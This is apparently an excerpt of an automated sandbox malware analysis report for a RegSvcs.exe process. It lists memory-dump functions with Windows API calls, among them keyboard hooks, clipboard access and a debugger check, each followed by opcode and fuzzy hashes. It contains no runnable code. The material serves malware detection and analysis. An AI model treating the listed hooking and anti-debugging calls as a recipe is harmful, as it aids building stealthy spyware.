                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a244d5f4319875e2674d41e0e20cc40116ec04b29294994c9dff14191729581
                                            • Instruction ID: 5446a2a12feeddaa5e9fc6fd9ce04f93044244fdae2c0373a07037dd66c0c321
                                            • Opcode Fuzzy Hash: 4a244d5f4319875e2674d41e0e20cc40116ec04b29294994c9dff14191729581
                                            • Instruction Fuzzy Hash: 5A416872D043959FCB04DFB9D8046EEBFF5AF89310F14866AD409A7641EB389840CBE1
                                            Function 06A429D8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2176 6a429d8-6a42a3e 2177 6a42a40-6a42a46 2176->2177 2178 6a42a49-6a42a50 2176->2178 2177->2178 2179 6a42a52-6a42a58 2178->2179 2180 6a42a5b-6a42afa CreateWindowExW 2178->2180 2179->2180 2182 6a42b03-6a42b3b 2180->2182 2183 6a42afc-6a42b02 2180->2183 2187 6a42b3d-6a42b40 2182->2187 2188 6a42b48 2182->2188 2183->2182 2187->2188 2189 6a42b49 2188->2189 2189->2189
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A42AEA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: bd71b1e0087c1b3407d69fbe945d056748b935851ef043b7d6bbd0cf161972ea
                                            • Instruction ID: 6a31d4ea55c8c2b1e8907c896e7242fc321d464ac2ddffd424668fd47c33b7dd
                                            • Opcode Fuzzy Hash: bd71b1e0087c1b3407d69fbe945d056748b935851ef043b7d6bbd0cf161972ea
                                            • Instruction Fuzzy Hash: 2F41A0B1D10349DFDB14DF9AC884ADEBBB5BF88310F24812AE819AB210D775A945CF90
                                            Function 06A4632C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06A47689
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: ca7c19c6bebfcb162dd681b7d3156803e05dea87d836593e5707a6ac80c4a916
                                            • Instruction ID: dcbf9ac4a9cd8050f3903f9c7415809356798b5af9c6c63daa370a33e01e36bc
                                            • Opcode Fuzzy Hash: ca7c19c6bebfcb162dd681b7d3156803e05dea87d836593e5707a6ac80c4a916
                                            • Instruction Fuzzy Hash: 0D4126B4900349CFDB54EF99C888AAAFBF5FF88314F258459D519AB321C775A841CFA0
                                            Function 06A48309 Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: e79b7980228cfaaa953aab6b74e2c00f779e15ba4bd1a976b028455aa0433d9d
                                            • Instruction ID: 8d6c76d9d562064c97ba8a35943e7e25d6af673aa7978a0b85347c70fc0b3ced
                                            • Opcode Fuzzy Hash: e79b7980228cfaaa953aab6b74e2c00f779e15ba4bd1a976b028455aa0433d9d
                                            • Instruction Fuzzy Hash: 1731E2B0D01208DFDB54EF99D984BCEBBF5AB48304F248029E505BB290DB74A945CBA5
                                            Function 06A47D40 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 124afd0b5d152a980b95d6998eb353e0066434c97a890d41ea35bf548c325c46
                                            • Instruction ID: d6ade94e5d6969b789f1f87701a05714510c22c25d7c7c8d40553da5486cc3b1
                                            • Opcode Fuzzy Hash: 124afd0b5d152a980b95d6998eb353e0066434c97a890d41ea35bf548c325c46
                                            • Instruction Fuzzy Hash: F93102B0D01208DFDB50EF99D984BDEBBF5EB48304F208029E504BB290DB78A845CBA5
                                            Function 02F370B3 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02F3712F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 0e8dca9416a488a02827ca26d28e4c19227f5675e57ebe3fd292c05321d313cd
                                            • Instruction ID: 316d23be02ec4b831bd72c0daccf68aa86d5dbe58b88ecb175c5fad67a2b52ee
                                            • Opcode Fuzzy Hash: 0e8dca9416a488a02827ca26d28e4c19227f5675e57ebe3fd292c05321d313cd
                                            • Instruction Fuzzy Hash: 822148B2C002598FDB10DFAAD484BEEFBF4AF49310F14845AE459B3251C738A945CF61
                                            Function 06A46728 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A467B7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 70960ff6fe82fa2457236409b92ddda3723c9f5bcf931c8b0eead5ef8fb72e0b
                                            • Instruction ID: cba9462fda113d7f2f81de793c39a3043a12cdf453b15cf5054a52ec599f83dd
                                            • Opcode Fuzzy Hash: 70960ff6fe82fa2457236409b92ddda3723c9f5bcf931c8b0eead5ef8fb72e0b
                                            • Instruction Fuzzy Hash: 9621E3B5D10249AFDB10DFAAD984ADEBFF8EB49310F14801AE958A3311C374A954CFA1
                                            Function 06A46730 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A467B7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 6c367e1d771ec76263457bca0a3be00c55708f62dcccf9777e5097f879dc03f6
                                            • Instruction ID: 694c0761abe113348f442f89280347d3387a147207ff0ef504d80b3a56b9e776
                                            • Opcode Fuzzy Hash: 6c367e1d771ec76263457bca0a3be00c55708f62dcccf9777e5097f879dc03f6
                                            • Instruction Fuzzy Hash: 0C21E4B5D002499FDB10DFAAD884ADEBBF8FB48310F14801AE918A3310C374A944CFA1
                                            Function 06A49E06 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06A49E83
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: c3717a621393c3d42370e860577e6b31ef11868511494716ae2aa9770901491b
                                            • Instruction ID: 6e912b84dd1583069efb691d39860a6831808ecdcce1b64ff72871ae833ab9ae
                                            • Opcode Fuzzy Hash: c3717a621393c3d42370e860577e6b31ef11868511494716ae2aa9770901491b
                                            • Instruction Fuzzy Hash: 1B2113B5D002099FCB54DF9AC844BEFFBF5BB89310F10842AE419A7250CB75A944CFA1
                                            Function 06A49E08 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06A49E83
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 06c3f0367f30122faca8ffe7f03ae826f005a36237f1b9642ae9b608302da094
                                            • Instruction ID: 942dedf0d358671c4c3187bea5b3d376e0c88007a80f71dbb89b9aed16ec926b
                                            • Opcode Fuzzy Hash: 06c3f0367f30122faca8ffe7f03ae826f005a36237f1b9642ae9b608302da094
                                            • Instruction Fuzzy Hash: E42113B5D002099FCB14DF9AC844BEFFBF5BB88310F10842AE419A7250CB75A944CFA1
                                            Function 02F3F260 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 02F3F2C7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: ec365d5b4dc58412cd6b482ab67c9b10fe783710399d561446584a354be51949
                                            • Instruction ID: e8d189dd753f4f8ad0533831bb48050df7ab9b5edbdcefd79ba3083dca39e444
                                            • Opcode Fuzzy Hash: ec365d5b4dc58412cd6b482ab67c9b10fe783710399d561446584a354be51949
                                            • Instruction Fuzzy Hash: 9A1112B1C0065A9BCB10CFAAC444ADEFBF4BB48320F11816AE818A7640D378A944CFA1
                                            Function 06A40BAC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06A41996
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 393acdc4fe5605ed0bf4dbaa038fc9aee2ea6a934128047e650167bd0b24d011
                                            • Instruction ID: c9ea784bfe7ff5df87749aeef9fecf625a066ad715e74d24a21ec9dbcc473bd9
                                            • Opcode Fuzzy Hash: 393acdc4fe5605ed0bf4dbaa038fc9aee2ea6a934128047e650167bd0b24d011
                                            • Instruction Fuzzy Hash: CE11F0B5C002499FDB10EF9AC844AAEFBF4EB89210F10841AD519B7311D375A945CFA5
                                            Function 06A4192B Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06A41996
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 1daa42db18e3d51fe1df3c9bad33ffa8d9643e7ee77217b843fd7641e4f0e929
                                            • Instruction ID: 8bc3ef72b5639b609d98cf92e04164ccd171a273cc58d8b898c459ec2c4dab73
                                            • Opcode Fuzzy Hash: 1daa42db18e3d51fe1df3c9bad33ffa8d9643e7ee77217b843fd7641e4f0e929
                                            • Instruction Fuzzy Hash: 671132B5C007498FCB10EFAAD844ADEFBF8AF89220F10841AD468B7210C375A545CFA1
                                            Function 06A464CC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 06A4821D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 606aa8680845fcb3453e08c094f60907d31c8d33aa06ac715ef2bc0831681d05
                                            • Instruction ID: f36b0f2f07e8dd0cc9246f7a408d6a305b71f1b006f1761108ca8c6473526a00
                                            • Opcode Fuzzy Hash: 606aa8680845fcb3453e08c094f60907d31c8d33aa06ac715ef2bc0831681d05
                                            • Instruction Fuzzy Hash: F91115B5C007498FDB50EF9AD848BDEBBF8EB48310F208459D529B7210C379A944CFA5
                                            Function 06A46384 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06A478D5), ref: 06A4795F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 663c0194d24ec4a4f707abbc807926177c76f208441fd6317b6900a5593a0238
                                            • Instruction ID: cf250b1aaf0d268d22ac8ff76e1ed0d36880d1de2d107a9e0d02c83e2f4d6c72
                                            • Opcode Fuzzy Hash: 663c0194d24ec4a4f707abbc807926177c76f208441fd6317b6900a5593a0238
                                            • Instruction Fuzzy Hash: CF1103B5C003899FCB50EF9AD848BDEBBF8EB88324F208459D519B7251C375A944CFA5
                                            Function 06A478F8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06A478D5), ref: 06A4795F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 9ef01aabbf6e4009ac413595b1fba9e04e82351e5dbc400f0db8b21cd74ffe41
                                            • Instruction ID: f6a2ca1ac239cecb2a17779023ad0de3260537d10d83aa6fd7c3109e40ab9855
                                            • Opcode Fuzzy Hash: 9ef01aabbf6e4009ac413595b1fba9e04e82351e5dbc400f0db8b21cd74ffe41
                                            • Instruction Fuzzy Hash: 9C11F2B5C002498FCB50DF9AD844BDEBBF8AB89320F208419D519B7350C375A544CFA5
                                            Function 06A481C1 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 06A4821D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 35f1790862fecba6120f59489d357a7f7b1f54f42a7c40492a713006c170478c
                                            • Instruction ID: a1136132d6841736e8ae17550443b8af7e1b2cdc82eb0752db21b213c8bf79b9
                                            • Opcode Fuzzy Hash: 35f1790862fecba6120f59489d357a7f7b1f54f42a7c40492a713006c170478c
                                            • Instruction Fuzzy Hash: F51103B5C107498FCB20DFAAD448BDEFBF8AB48310F248459D529A7600C379A544CFA5
                                            Function 06A5479D Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XPbq
                                            • API String ID: 0-864591470
                                            • Opcode ID: 07948d7b7d030c2d46b87c76481ff2800adf23cbbbb0929535488b306f09ff2f
                                            • Instruction ID: b71e5afacb15a66ad7138c84db467fcbb3f3c2162688f3d580974592fbe4d436
                                            • Opcode Fuzzy Hash: 07948d7b7d030c2d46b87c76481ff2800adf23cbbbb0929535488b306f09ff2f
                                            • Instruction Fuzzy Hash: 71418D70B002199FEB54EFA5C854B9EBAF7FF88700F208529E506AB394DB748C41CB91
                                            Function 06A5DAFD Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: f107f8a1be0c27b6bd52d018a2530c78286b91ef5df7d8cb9d19c90cc9750a1a
                                            • Instruction ID: bd4e923a94d009f96b8a5de527edfd98ec380c4ddd2e88c92e68280f26f5865f
                                            • Opcode Fuzzy Hash: f107f8a1be0c27b6bd52d018a2530c78286b91ef5df7d8cb9d19c90cc9750a1a
                                            • Instruction Fuzzy Hash: CD41A170E1020ADBDB64FF75D89069EBBB2BF85300F214929E805EB244DB74A946CB95
                                            Function 06A52208 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: afd1fb53ba691579ad4e8c3e8735ec97b61c69340bc4c6dbfb63e846c5434fc1
                                            • Instruction ID: 406e930b9de8c1ab8997bdda2a69c364d1d6f3c94b1c7e5c7b9aff3d2be2b714
                                            • Opcode Fuzzy Hash: afd1fb53ba691579ad4e8c3e8735ec97b61c69340bc4c6dbfb63e846c5434fc1
                                            • Instruction Fuzzy Hash: 2131B030B102069FDB58EB74D45466E77E3ABC9210F218868D80ADB385DE39DD86CB95
                                            Function 06A54691 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Obq
                                            • API String ID: 0-2878401908
                                            • Opcode ID: 92e27dd56b44d18c3e6e2dccad005f1e0786600ba9b0f31e5f438c4985c305c1
                                            • Instruction ID: 5e8c8568b310f6325e7a5eec8bfcce33ebef86d0fb7592271b52b5d2673e74e9
                                            • Opcode Fuzzy Hash: 92e27dd56b44d18c3e6e2dccad005f1e0786600ba9b0f31e5f438c4985c305c1
                                            • Instruction Fuzzy Hash: B6F0F430E50219DFDB54DF94D958BAEB7B2FF88701F204519E402A7694CB741C41CF80
                                            Function 06A53ED8 Relevance: .2, Instructions: 231COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26b524c6b5d92c060c5ab77408255b9d0fc2a3d165f197260f294c8481965823
                                            • Instruction ID: f3feb1c53cd08de446a61ccf7092185c7c005afcad9191d9316b414d00b8046b
                                            • Opcode Fuzzy Hash: 26b524c6b5d92c060c5ab77408255b9d0fc2a3d165f197260f294c8481965823
                                            • Instruction Fuzzy Hash: D5816130B002099BDF54DB69D4546AEB7F3FF89304F218529E80ADB395EB35DC868B91
                                            Function 06A55E28 Relevance: .2, Instructions: 229COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 527a4a12af3a01db5e0a62ef714021a822bbf39e075fc3b4e15f7f9f9b50664a
                                            • Instruction ID: b179b3bac2aae99394d8b5dd8e078a7b5609e1d543cc0541c4cf658d7cb7e87b
                                            • Opcode Fuzzy Hash: 527a4a12af3a01db5e0a62ef714021a822bbf39e075fc3b4e15f7f9f9b50664a
                                            • Instruction Fuzzy Hash: 77619F71F001214FDB64EB6AC88066FBAD7AF95224B254479E80EDB360DE7ADD0287D1
                                            Function 06A541F8 Relevance: .2, Instructions: 220COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc90ddbd879a66866e8234ed734786da151be04af06bb22a87c937339cb930df
                                            • Instruction ID: 5a17abf5c19818cd01eae886a4a572d3ab80107630be642982671eaafb473762
                                            • Opcode Fuzzy Hash: fc90ddbd879a66866e8234ed734786da151be04af06bb22a87c937339cb930df
                                            • Instruction Fuzzy Hash: E7914C30E1021A8BDF60DF68C890B9DB7B1FF89310F208599D54DAB295DB70AA86CF51
                                            Function 06A54210 Relevance: .2, Instructions: 210COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57a24ca45618d1ab34067b4b861e7ecab5647e3a0287580db4f9eb9a181250b4
                                            • Instruction ID: 4f1836f62a129f4f0c72bc43cb31528e7148d3e2435c4957119f844ae6346942
                                            • Opcode Fuzzy Hash: 57a24ca45618d1ab34067b4b861e7ecab5647e3a0287580db4f9eb9a181250b4
                                            • Instruction Fuzzy Hash: 93912C30E1061A8BDF60DF68C890B9DB7B1FF89310F208599D54DBB255DB70AA86CF91
                                            Function 06A5EB58 Relevance: .2, Instructions: 210COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a84924468e2d883207e6f1bed8f6ce9fd0f7f20ad5bd0086ac79c5dc74cab0ac
                                            • Instruction ID: 11c003638c327d60b3b80b19f929bb6a4d3daee516b900ec22b402b8cd25e968
                                            • Opcode Fuzzy Hash: a84924468e2d883207e6f1bed8f6ce9fd0f7f20ad5bd0086ac79c5dc74cab0ac
                                            • Instruction Fuzzy Hash: B6713E71A002099FDB54EFA9C990A9EBBF6FF88300F258529E405EB355DB34ED46CB50
                                            Function 06A5F67A Relevance: .2, Instructions: 203COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c103103215bdc1d013899292ca01b415c35209d2110c188bff1d894e1ade86b
                                            • Instruction ID: 2c7883ccf26f6ae7ee6e0335f60ae688a7cf2954ed0c61860e8c03ab10810ea6
                                            • Opcode Fuzzy Hash: 6c103103215bdc1d013899292ca01b415c35209d2110c188bff1d894e1ade86b
                                            • Instruction Fuzzy Hash: CD51E474B201055FEF64A76DD99472F369AD78D310F214426E90ACB790CA3DCC918BD2
                                            Function 06A5EB68 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d4f220e859c44255c9e400a3a30ad1ab4731f46de61fcd613d2fc8ac9090ef3
                                            • Instruction ID: 1801c072ec0dce649cacabd8c2659800c294cadae398a863ad54b828bfda84a4
                                            • Opcode Fuzzy Hash: 8d4f220e859c44255c9e400a3a30ad1ab4731f46de61fcd613d2fc8ac9090ef3
                                            • Instruction Fuzzy Hash: F6711D71A002099FDB54EFA9C990A9DBBF6FF88300F258529D409EB355DB34ED46CB50
                                            Function 06A5FCD0 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8182cb6dd04cf378b68e8a40a75407695e906c9a59023385c7031dd0529ebb6c
                                            • Instruction ID: 4cb46d82f5452d61d10e532ecc1fafdc1ccf4357b4cf3d85337dfa0e3b7dbec6
                                            • Opcode Fuzzy Hash: 8182cb6dd04cf378b68e8a40a75407695e906c9a59023385c7031dd0529ebb6c
                                            • Instruction Fuzzy Hash: A6510331E001099FCF64FBB8E9446AEB7B2FB89315F104869E90ADB251DB358D56CF81
                                            Function 06A5F688 Relevance: .2, Instructions: 163COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87282b353b75c74da366afe9c2453b86b6908fe3f61ef43db8428689f1215ed7
                                            • Instruction ID: a8072fc83e244eb134aefcd8464ae8335687dcbd7a718357276f1530c667d05a
                                            • Opcode Fuzzy Hash: 87282b353b75c74da366afe9c2453b86b6908fe3f61ef43db8428689f1215ed7
                                            • Instruction Fuzzy Hash: 4D51F5B4B201055FEF60A76DD98472E369AD78D310F21442AE90ADB394CA3DCC918B92
